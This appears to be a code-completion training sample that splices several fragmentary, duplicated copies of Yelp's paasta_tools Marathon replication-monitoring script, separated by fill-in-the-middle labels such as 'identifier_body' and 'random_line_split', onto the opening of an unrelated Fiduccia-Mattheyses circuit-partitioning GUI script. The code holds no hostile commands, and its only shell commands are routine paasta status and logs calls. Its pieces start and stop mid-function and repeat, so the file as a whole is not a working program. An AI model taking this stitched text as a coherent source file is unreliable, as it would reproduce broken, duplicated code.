help="define a different soa config directory",
)
parser.add_argument(
'-v', '--verbose', action='store_true',
dest="verbose", default=False,
)
options = parser.parse_args()
return options
def check_smartstack_replication_for_instance(
instance_config,
expected_count,
smartstack_replication_checker,
):
"""Check a set of namespaces to see if their number of available backends is too low,
emitting events to Sensu based on the fraction available and the thresholds defined in
the corresponding yelpsoa config.
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
crit_threshold = instance_config.get_replication_crit_percentage()
log.info('Checking instance %s in smartstack', instance_config.job_id)
smartstack_replication_info = \
smartstack_replication_checker.get_replication_for_instance(instance_config)
log.debug('Got smartstack replication info for %s: %s' %
(instance_config.job_id, smartstack_replication_info))
if len(smartstack_replication_info) == 0:
status = pysensu_yelp.Status.CRITICAL
output = (
'Service %s has no Smartstack replication info. Make sure the discover key in your smartstack.yaml '
'is valid!\n'
) % instance_config.job_id
log.error(output)
else:
expected_count_per_location = int(expected_count / len(smartstack_replication_info))
output = ''
output_critical = ''
output_ok = ''
under_replication_per_location = []
for location, available_backends in sorted(smartstack_replication_info.items()):
num_available_in_location = available_backends.get(instance_config.job_id, 0)
under_replicated, ratio = is_under_replicated(
num_available_in_location, expected_count_per_location, crit_threshold,
)
if under_replicated:
output_critical += '- Service %s has %d out of %d expected instances in %s (CRITICAL: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
else:
output_ok += '- Service %s has %d out of %d expected instances in %s (OK: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
under_replication_per_location.append(under_replicated)
output += output_critical
if output_critical and output_ok:
output += '\n\n'
output += 'The following locations are OK:\n'
output += output_ok
if any(under_replication_per_location):
status = pysensu_yelp.Status.CRITICAL
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that a SmartStack powered loadbalancer (haproxy)\n"
" doesn't have enough healthy backends. Not having enough healthy backends\n"
" means that clients of that service will get 503s (http) or connection refused\n"
" (tcp) when trying to connect to it.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply not have enough copies or it could simply be\n"
" unhealthy in that location. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * You can view the logs for the job with:\n"
" paasta logs -s %(service)s -i %(instance)s -c %(cluster)s\n"
"\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
"\n"
" * Widen SmartStack discovery settings\n"
" * Increase the instance count\n"
"\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
else:
status = pysensu_yelp.Status.OK
log.info(output)
send_event(instance_config=instance_config, status=status, output=output)
def filter_healthy_marathon_instances_for_short_app_id(all_tasks, app_id):
tasks_for_app = [task for task in all_tasks if task.app_id.startswith('/%s' % app_id)]
one_minute_ago = datetime.now() - timedelta(minutes=1)
healthy_tasks = []
for task in tasks_for_app:
if marathon_tools.is_task_healthy(task, default_healthy=True) \
and task.started_at is not None \
and datetime_from_utc_to_local(task.started_at) < one_minute_ago:
healthy_tasks.append(task)
return len(healthy_tasks)
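# Sketch of what counts as "healthy" above (example task values are made up): a task is
# included only if all of the following hold, e.g.
#   task.app_id = '/mumble.main.gitdeadbeef.configcafe123'  -> startswith('/mumble.main')
#   marathon_tools.is_task_healthy(task, default_healthy=True) is True
#   task.started_at is set and lies more than one minute in the past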
def check_healthy_marathon_tasks_for_service_instance(
instance_config,
expected_count,
all_tasks,
):
app_id = format_job_id(instance_config.service, instance_config.instance)
num_healthy_tasks = filter_healthy_marathon_instances_for_short_app_id(
all_tasks=all_tasks,
app_id=app_id,
)
log.info("Checking %s in marathon as it is not in smartstack" % app_id)
send_event_if_under_replication(
instance_config=instance_config,
expected_count=expected_count,
num_available=num_healthy_tasks,
)
def send_event_if_under_replication(
instance_config,
expected_count,
num_available,
):
crit_threshold = instance_config.get_replication_crit_percentage()
output = (
'Service %s has %d out of %d expected instances available!\n' +
'(threshold: %d%%)'
) % (instance_config.job_id, num_available, expected_count, crit_threshold)
under_replicated, _ = is_under_replicated(num_available, expected_count, crit_threshold)
if under_replicated:
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that the service PaaSTA can't keep the\n"
" requested number of copies up and healthy in the cluster.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply unhealthy. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * Increase the instance count\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
status = pysensu_yelp.Status.CRITICAL
else:
log.info(output)
status = pysensu_yelp.Status.OK
send_event(
instance_config=instance_config,
status=status,
output=output,
)
def check_service_replication(
instance_config,
all_tasks,
smartstack_replication_checker,
):
"""Checks a service's replication levels based on how the service's replication
should be monitored. (smartstack or mesos)
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
expected_count = instance_config.get_instances()
log.info("Expecting %d total tasks for %s" % (expected_count, instance_config.job_id))
proxy_port = marathon_tools.get_proxy_port_for_instance(
name=instance_config.service,
instance=instance_config.instance,
cluster=instance_config.cluster,
soa_dir=instance_config.soa_dir,
)
registrations = instance_config.get_registrations()
# if the primary registration does not match the service_instance name then
# the best we can do is check marathon for replication (for now).
if proxy_port is not None and registrations[0] == instance_config.job_id:
check_smartstack_replication_for_instance(
instance_config=instance_config,
expected_count=expected_count,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
check_healthy_marathon_tasks_for_service_instance(
instance_config=instance_config,
expected_count=expected_count,
all_tasks=all_tasks,
)
def list_services(soa_dir):
|
def main():
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
system_paasta_config = load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
clients = marathon_tools.get_marathon_clients(marathon_tools.get_marathon_servers(system_paasta_config))
all_clients = clients.get_all_clients()
all_tasks = []
for client in all_clients:
all_tasks.extend(client.list_tasks())
mesos_slaves = a_sync.block(get_slaves)
smartstack_replication_checker = SmartstackReplicationChecker(mesos_slaves, system_paasta_config)
for service in list_services(soa_dir=args.soa_dir):
service_config = PaastaServiceConfigLoader(service=service, soa_dir=args.soa_dir)
for instance_config in service_config.instance_configs(
cluster=cluster,
instance_type_class=marathon_tools.MarathonServiceConfig,
):
if instance_config.get_docker_image():
check_service_replication(
instance_config=instance_config,
all_tasks=all_tasks,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
log.debug(
'%s is not deployed. Skipping replication monitoring.' %
instance_config.job_id,
)
if __name__ == "__main__":
main()
| rootdir = os.path.abspath(soa_dir)
return os.listdir(rootdir) | identifier_body |
check_marathon_services_replication.py | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./check_marathon_services_replication.py [options]
This is a script that checks the number of HAProxy backends via Synapse against
the expected amount that should've been deployed via Marathon in a mesos cluster.
Basically, the script checks smartstack.yaml for listed namespaces, and then queries
Synapse for the number of available backends for that namespace. It then goes through
the Marathon service configuration file for that cluster, and sees how many instances
are expected to be available for that namespace based on the number of instances deployed
on that namespace.
After retrieving that information, a fraction of available instances is calculated
(available/expected), and then compared against a threshold. The default threshold is
50, meaning if less than 50% of a service's backends are available, the script sends
CRITICAL. If replication_threshold is defined in the yelpsoa config for a service
instance then it will be used instead.
"""
import argparse
import logging
import os
from datetime import datetime
from datetime import timedelta
import a_sync
import pysensu_yelp
from paasta_tools import marathon_tools
from paasta_tools import monitoring_tools
from paasta_tools.marathon_tools import format_job_id
from paasta_tools.mesos_tools import get_slaves
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.smartstack_tools import SmartstackReplicationChecker
from paasta_tools.utils import _log
from paasta_tools.utils import datetime_from_utc_to_local
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import is_under_replicated
from paasta_tools.utils import load_system_paasta_config
log = logging.getLogger(__name__)
def send_event(instance_config, status, output):
"""Send an event to sensu via pysensu_yelp with the given information.
:param instance_config: an instance of MarathonServiceConfig
:param status: The status to emit for this event
:param output: The output to emit for this event"""
# instance_config.job_id is expected to be a string like "mumble.main"
monitoring_overrides = instance_config.get_monitoring()
if 'alert_after' not in monitoring_overrides:
monitoring_overrides['alert_after'] = '2m'
monitoring_overrides['check_every'] = '1m'
monitoring_overrides['runbook'] = monitoring_tools.get_runbook(
monitoring_overrides,
instance_config.service, soa_dir=instance_config.soa_dir,
)
check_name = (
'check_marathon_services_replication.%s' %
instance_config.job_id
)
monitoring_tools.send_event(
service=instance_config.service,
check_name=check_name,
overrides=monitoring_overrides,
status=status,
output=output,
soa_dir=instance_config.soa_dir,
cluster=instance_config.cluster,
)
_log(
service=instance_config.service,
line='Replication: %s' % output,
component='monitoring',
level='debug',
cluster=instance_config.cluster,
instance=instance_config.instance,
)
def parse_args():
epilog = "PERCENTAGE is an integer value representing the percentage of available to expected instances"
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
parser.add_argument(
'-v', '--verbose', action='store_true',
dest="verbose", default=False,
)
options = parser.parse_args()
return options
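# Example invocation (sketch; the soa config dir path is just an illustration):
#
#   ./check_marathon_services_replication.py -d /nail/etc/services -v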
def | (
instance_config,
expected_count,
smartstack_replication_checker,
):
"""Check a set of namespaces to see if their number of available backends is too low,
emitting events to Sensu based on the fraction available and the thresholds defined in
the corresponding yelpsoa config.
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
crit_threshold = instance_config.get_replication_crit_percentage()
log.info('Checking instance %s in smartstack', instance_config.job_id)
smartstack_replication_info = \
smartstack_replication_checker.get_replication_for_instance(instance_config)
log.debug('Got smartstack replication info for %s: %s' %
(instance_config.job_id, smartstack_replication_info))
if len(smartstack_replication_info) == 0:
status = pysensu_yelp.Status.CRITICAL
output = (
'Service %s has no Smartstack replication info. Make sure the discover key in your smartstack.yaml '
'is valid!\n'
) % instance_config.job_id
log.error(output)
else:
expected_count_per_location = int(expected_count / len(smartstack_replication_info))
output = ''
output_critical = ''
output_ok = ''
under_replication_per_location = []
for location, available_backends in sorted(smartstack_replication_info.items()):
num_available_in_location = available_backends.get(instance_config.job_id, 0)
under_replicated, ratio = is_under_replicated(
num_available_in_location, expected_count_per_location, crit_threshold,
)
if under_replicated:
output_critical += '- Service %s has %d out of %d expected instances in %s (CRITICAL: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
else:
output_ok += '- Service %s has %d out of %d expected instances in %s (OK: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
under_replication_per_location.append(under_replicated)
output += output_critical
if output_critical and output_ok:
output += '\n\n'
output += 'The following locations are OK:\n'
output += output_ok
if any(under_replication_per_location):
status = pysensu_yelp.Status.CRITICAL
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that a SmartStack powered loadbalancer (haproxy)\n"
" doesn't have enough healthy backends. Not having enough healthy backends\n"
" means that clients of that service will get 503s (http) or connection refused\n"
" (tcp) when trying to connect to it.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply not have enough copies or it could simply be\n"
" unhealthy in that location. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * You can view the logs for the job with:\n"
" paasta logs -s %(service)s -i %(instance)s -c %(cluster)s\n"
"\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
"\n"
" * Widen SmartStack discovery settings\n"
" * Increase the instance count\n"
"\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
else:
status = pysensu_yelp.Status.OK
log.info(output)
send_event(instance_config=instance_config, status=status, output=output)
def filter_healthy_marathon_instances_for_short_app_id(all_tasks, app_id):
tasks_for_app = [task for task in all_tasks if task.app_id.startswith('/%s' % app_id)]
one_minute_ago = datetime.now() - timedelta(minutes=1)
healthy_tasks = []
for task in tasks_for_app:
if marathon_tools.is_task_healthy(task, default_healthy=True) \
and task.started_at is not None \
and datetime_from_utc_to_local(task.started_at) < one_minute_ago:
healthy_tasks.append(task)
return len(healthy_tasks)
def check_healthy_marathon_tasks_for_service_instance(
instance_config,
expected_count,
all_tasks,
):
app_id = format_job_id(instance_config.service, instance_config.instance)
num_healthy_tasks = filter_healthy_marathon_instances_for_short_app_id(
all_tasks=all_tasks,
app_id=app_id,
)
log.info("Checking %s in marathon as it is not in smartstack" % app_id)
send_event_if_under_replication(
instance_config=instance_config,
expected_count=expected_count,
num_available=num_healthy_tasks,
)
def send_event_if_under_replication(
instance_config,
expected_count,
num_available,
):
crit_threshold = instance_config.get_replication_crit_percentage()
output = (
'Service %s has %d out of %d expected instances available!\n' +
'(threshold: %d%%)'
) % (instance_config.job_id, num_available, expected_count, crit_threshold)
under_replicated, _ = is_under_replicated(num_available, expected_count, crit_threshold)
if under_replicated:
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that the service PaaSTA can't keep the\n"
" requested number of copies up and healthy in the cluster.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply unhealthy. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * Increase the instance count\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
status = pysensu_yelp.Status.CRITICAL
else:
log.info(output)
status = pysensu_yelp.Status.OK
send_event(
instance_config=instance_config,
status=status,
output=output,
)
def check_service_replication(
instance_config,
all_tasks,
smartstack_replication_checker,
):
"""Checks a service's replication levels based on how the service's replication
should be monitored. (smartstack or mesos)
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
expected_count = instance_config.get_instances()
log.info("Expecting %d total tasks for %s" % (expected_count, instance_config.job_id))
proxy_port = marathon_tools.get_proxy_port_for_instance(
name=instance_config.service,
instance=instance_config.instance,
cluster=instance_config.cluster,
soa_dir=instance_config.soa_dir,
)
registrations = instance_config.get_registrations()
# if the primary registration does not match the service_instance name then
# the best we can do is check marathon for replication (for now).
if proxy_port is not None and registrations[0] == instance_config.job_id:
check_smartstack_replication_for_instance(
instance_config=instance_config,
expected_count=expected_count,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
check_healthy_marathon_tasks_for_service_instance(
instance_config=instance_config,
expected_count=expected_count,
all_tasks=all_tasks,
)
def list_services(soa_dir):
rootdir = os.path.abspath(soa_dir)
return os.listdir(rootdir)
def main():
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
system_paasta_config = load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
clients = marathon_tools.get_marathon_clients(marathon_tools.get_marathon_servers(system_paasta_config))
all_clients = clients.get_all_clients()
all_tasks = []
for client in all_clients:
all_tasks.extend(client.list_tasks())
mesos_slaves = a_sync.block(get_slaves)
smartstack_replication_checker = SmartstackReplicationChecker(mesos_slaves, system_paasta_config)
for service in list_services(soa_dir=args.soa_dir):
service_config = PaastaServiceConfigLoader(service=service, soa_dir=args.soa_dir)
for instance_config in service_config.instance_configs(
cluster=cluster,
instance_type_class=marathon_tools.MarathonServiceConfig,
):
if instance_config.get_docker_image():
check_service_replication(
instance_config=instance_config,
all_tasks=all_tasks,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
log.debug(
'%s is not deployed. Skipping replication monitoring.' %
instance_config.job_id,
)
if __name__ == "__main__":
main()
| check_smartstack_replication_for_instance | identifier_name |
check_marathon_services_replication.py | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./check_marathon_services_replication.py [options]
This is a script that checks the number of HAProxy backends via Synapse against
the expected amount that should've been deployed via Marathon in a mesos cluster.
Basically, the script checks smartstack.yaml for listed namespaces, and then queries
Synapse for the number of available backends for that namespace. It then goes through
the Marathon service configuration file for that cluster, and sees how many instances
are expected to be available for that namespace based on the number of instances deployed
on that namespace.
After retrieving that information, a fraction of available instances is calculated
(available/expected), and then compared against a threshold. The default threshold is
50, meaning if less than 50% of a service's backends are available, the script sends
CRITICAL. If replication_threshold is defined in the yelpsoa config for a service
instance then it will be used instead.
"""
import argparse
import logging
import os
from datetime import datetime
from datetime import timedelta
import a_sync
import pysensu_yelp
from paasta_tools import marathon_tools
from paasta_tools import monitoring_tools
from paasta_tools.marathon_tools import format_job_id
from paasta_tools.mesos_tools import get_slaves
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.smartstack_tools import SmartstackReplicationChecker
from paasta_tools.utils import _log
from paasta_tools.utils import datetime_from_utc_to_local
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import is_under_replicated
from paasta_tools.utils import load_system_paasta_config
log = logging.getLogger(__name__)
def send_event(instance_config, status, output):
"""Send an event to sensu via pysensu_yelp with the given information.
:param instance_config: an instance of MarathonServiceConfig
:param status: The status to emit for this event
:param output: The output to emit for this event"""
# instance_config.job_id is expected to be a string like "mumble.main"
monitoring_overrides = instance_config.get_monitoring()
if 'alert_after' not in monitoring_overrides:
monitoring_overrides['alert_after'] = '2m'
monitoring_overrides['check_every'] = '1m'
monitoring_overrides['runbook'] = monitoring_tools.get_runbook(
monitoring_overrides,
instance_config.service, soa_dir=instance_config.soa_dir,
)
check_name = (
'check_marathon_services_replication.%s' %
instance_config.job_id
)
monitoring_tools.send_event(
service=instance_config.service,
check_name=check_name,
overrides=monitoring_overrides,
status=status,
output=output,
soa_dir=instance_config.soa_dir,
cluster=instance_config.cluster,
)
_log(
service=instance_config.service,
line='Replication: %s' % output,
component='monitoring',
level='debug',
cluster=instance_config.cluster,
instance=instance_config.instance,
)
def parse_args():
epilog = "PERCENTAGE is an integer value representing the percentage of available to expected instances"
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
parser.add_argument(
'-v', '--verbose', action='store_true',
dest="verbose", default=False,
)
options = parser.parse_args()
return options
def check_smartstack_replication_for_instance(
instance_config,
expected_count,
smartstack_replication_checker,
):
"""Check a set of namespaces to see if their number of available backends is too low,
emitting events to Sensu based on the fraction available and the thresholds defined in
the corresponding yelpsoa config.
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
crit_threshold = instance_config.get_replication_crit_percentage()
log.info('Checking instance %s in smartstack', instance_config.job_id)
smartstack_replication_info = \
smartstack_replication_checker.get_replication_for_instance(instance_config) |
log.debug('Got smartstack replication info for %s: %s' %
(instance_config.job_id, smartstack_replication_info))
if len(smartstack_replication_info) == 0:
status = pysensu_yelp.Status.CRITICAL
output = (
'Service %s has no Smartstack replication info. Make sure the discover key in your smartstack.yaml '
'is valid!\n'
) % instance_config.job_id
log.error(output)
else:
expected_count_per_location = int(expected_count / len(smartstack_replication_info))
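# The expected count is split evenly across the discovered locations using integer
# division, so each location is checked against its own (rounded-down) share of the
# total expected instances.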
output = ''
output_critical = ''
output_ok = ''
under_replication_per_location = []
for location, available_backends in sorted(smartstack_replication_info.items()):
num_available_in_location = available_backends.get(instance_config.job_id, 0)
under_replicated, ratio = is_under_replicated(
num_available_in_location, expected_count_per_location, crit_threshold,
)
if under_replicated:
output_critical += '- Service %s has %d out of %d expected instances in %s (CRITICAL: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
else:
output_ok += '- Service %s has %d out of %d expected instances in %s (OK: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
under_replication_per_location.append(under_replicated)
output += output_critical
if output_critical and output_ok:
output += '\n\n'
output += 'The following locations are OK:\n'
output += output_ok
if any(under_replication_per_location):
status = pysensu_yelp.Status.CRITICAL
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that a SmartStack powered loadbalancer (haproxy)\n"
" doesn't have enough healthy backends. Not having enough healthy backends\n"
" means that clients of that service will get 503s (http) or connection refused\n"
" (tcp) when trying to connect to it.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply not have enough copies or it could simply be\n"
" unhealthy in that location. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * You can view the logs for the job with:\n"
" paasta logs -s %(service)s -i %(instance)s -c %(cluster)s\n"
"\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
"\n"
" * Widen SmartStack discovery settings\n"
" * Increase the instance count\n"
"\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
else:
status = pysensu_yelp.Status.OK
log.info(output)
send_event(instance_config=instance_config, status=status, output=output)
def filter_healthy_marathon_instances_for_short_app_id(all_tasks, app_id):
tasks_for_app = [task for task in all_tasks if task.app_id.startswith('/%s' % app_id)]
one_minute_ago = datetime.now() - timedelta(minutes=1)
healthy_tasks = []
for task in tasks_for_app:
if marathon_tools.is_task_healthy(task, default_healthy=True) \
and task.started_at is not None \
and datetime_from_utc_to_local(task.started_at) < one_minute_ago:
healthy_tasks.append(task)
return len(healthy_tasks)
def check_healthy_marathon_tasks_for_service_instance(
instance_config,
expected_count,
all_tasks,
):
app_id = format_job_id(instance_config.service, instance_config.instance)
num_healthy_tasks = filter_healthy_marathon_instances_for_short_app_id(
all_tasks=all_tasks,
app_id=app_id,
)
log.info("Checking %s in marathon as it is not in smartstack" % app_id)
send_event_if_under_replication(
instance_config=instance_config,
expected_count=expected_count,
num_available=num_healthy_tasks,
)
def send_event_if_under_replication(
instance_config,
expected_count,
num_available,
):
crit_threshold = instance_config.get_replication_crit_percentage()
output = (
'Service %s has %d out of %d expected instances available!\n' +
'(threshold: %d%%)'
) % (instance_config.job_id, num_available, expected_count, crit_threshold)
under_replicated, _ = is_under_replicated(num_available, expected_count, crit_threshold)
if under_replicated:
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that the service PaaSTA can't keep the\n"
" requested number of copies up and healthy in the cluster.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply unhealthy. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * Increase the instance count\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
status = pysensu_yelp.Status.CRITICAL
else:
log.info(output)
status = pysensu_yelp.Status.OK
send_event(
instance_config=instance_config,
status=status,
output=output,
)
def check_service_replication(
instance_config,
all_tasks,
smartstack_replication_checker,
):
"""Checks a service's replication levels based on how the service's replication
should be monitored. (smartstack or mesos)
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
expected_count = instance_config.get_instances()
log.info("Expecting %d total tasks for %s" % (expected_count, instance_config.job_id))
proxy_port = marathon_tools.get_proxy_port_for_instance(
name=instance_config.service,
instance=instance_config.instance,
cluster=instance_config.cluster,
soa_dir=instance_config.soa_dir,
)
registrations = instance_config.get_registrations()
# if the primary registration does not match the service_instance name then
# the best we can do is check marathon for replication (for now).
if proxy_port is not None and registrations[0] == instance_config.job_id:
check_smartstack_replication_for_instance(
instance_config=instance_config,
expected_count=expected_count,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
check_healthy_marathon_tasks_for_service_instance(
instance_config=instance_config,
expected_count=expected_count,
all_tasks=all_tasks,
)
def list_services(soa_dir):
rootdir = os.path.abspath(soa_dir)
return os.listdir(rootdir)
def main():
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
system_paasta_config = load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
clients = marathon_tools.get_marathon_clients(marathon_tools.get_marathon_servers(system_paasta_config))
all_clients = clients.get_all_clients()
all_tasks = []
for client in all_clients:
all_tasks.extend(client.list_tasks())
mesos_slaves = a_sync.block(get_slaves)
smartstack_replication_checker = SmartstackReplicationChecker(mesos_slaves, system_paasta_config)
for service in list_services(soa_dir=args.soa_dir):
service_config = PaastaServiceConfigLoader(service=service, soa_dir=args.soa_dir)
for instance_config in service_config.instance_configs(
cluster=cluster,
instance_type_class=marathon_tools.MarathonServiceConfig,
):
if instance_config.get_docker_image():
check_service_replication(
instance_config=instance_config,
all_tasks=all_tasks,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
log.debug(
'%s is not deployed. Skipping replication monitoring.' %
instance_config.job_id,
)
if __name__ == "__main__":
main() | random_line_split |
|
partitionA3.py | import time
import sys
import getopt
import partitionGUI
import random
import math
import bisect
import numpy as np
import Tkinter as tk
import networkx as nx
import matplotlib.pyplot as plt
from operator import itemgetter
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from _bisect import bisect_left
from time import sleep
class Partition():
""" Circuit Cell partitioning using Fiduccia-Matheyses
Circuit: A representation of a circuit by Cells to be partitioned in two sites
Cell: Circuit component represented as a Graph node with connections to other Cells as edges
Node: Graph representation of a Cell
Site: Possible location for a Cell (Is Free or is occupied by a Cell)
Block: Graphic representation and data of a Site
"""
def __init__(self,master,seed,inputfile,quietMode):
#=============Parse file to create cells graph===============#
# Create Directed Graph and fill with input file
self.G=nx.DiGraph()
fin = open(inputfile,'r')
self.getGraph(fin)
fin.close()
#================Create Data Structures================#
# Array of Line objects to draw connections
self.connLines = []
# Array of Block objects drawing the rectangles for each site on the circuit, tracks occupancy.
# One per partition
self.sitesA = []
self.blocksA = []
self.sitesB = []
self.blocksB = []
self.sitesABkp = []
self.sitesBBkp = []
# List of Nodes sorted by gains
self.gainOrder = []
# Array of Text objects noting the name of the node assigned to a cell site
self.tags = []
# Assign Initial Seed
self.seed = seed
#================Draw Buttons and plots================#
self.master = master
self.initialize_buttons()
self.initialize_plots()
# Quiet Mode to run without graphics
if quietMode:
self.running = True
# FM Partitioning Algorithm
self._startpartition(True)
sys.exit()
def getGraph(self, fin):
""" Parse Input File to fill up Graph structure """
tmpList = fin.readline().split()
# Number of Cells to be partitioned
self.cells = int(tmpList[0])
# Number of Connections or Nets
self.conns = int(tmpList[1])
# Number of Circuit Rows
self.rows = int(tmpList[2])
# Number of Circuit Columns
self.cols = int(tmpList[3])
# Number of available sites in the Circuit
self.sitesNum = self.rows*self.cols
self.winX = self.cols/4
self.winY = self.rows/4
# Add nodes from 0 to number of Cells to graph structure and initialize net array and net cost
self.G.add_nodes_from(range(0,self.cells))
for node in self.G.nodes():
self.G.node[node]["nets"]=[]
self.G.node[node]["locked"]=False
# For every Net, add edges between corresponding nodes
for net in range(0,self.conns):
tmpList = fin.readline().split()
numNodes = int(tmpList[0])
srcNode = int(tmpList[1])
#self.G.node[srcNode]["nets"].append(srcNode)
for conn in range(2,numNodes+1):
self.G.add_edge(srcNode, int(tmpList[conn]))
self.G.node[int(tmpList[conn])]["nets"].append(srcNode)
def initialize_buttons(self):
""" Draw User Buttons on top of interface
Start: Begin placement process
Pause: Pause process. Allows continuing.
Graph: Show Graph nodes to visualize connections
Plot: Show Cost plot to see SA progress
Draw: Show Circuit Cells
"""
self.start_button = tk.Button(self.master, text='Start', command = self.startRunning)
self.start_button.grid(row=0, column=0)
self.pause_button = tk.Button(self.master, text='Pause', command = self.pauseRunning)
self.pause_button.grid(row=0, column=1)
self.graph_button = tk.Button(self.master, text='Graph', command = self.showGraph)
self.graph_button.grid(row=0, column=2)
self.plot_button = tk.Button(self.master, text='Plot', command = self.showPlot)
self.plot_button.grid(row=0, column=3)
self.draw_button = tk.Button(self.master, text='Draw', command = self.drawCells)
self.draw_button.grid(row=0, column=4)
# Initialize Button States and Actions
self.pause_button['state'] = 'disabled'
# Boolean switch to control flow of placement process
self.running = False
# Boolean switch to plot placement connections and tags, turn off for faster processing
self.plot = False
self.drawing = False
self.graph = False
# Boolean switch to specify first run and allow stop/continue behavior that doesn't initialize program
self.firstRun = True
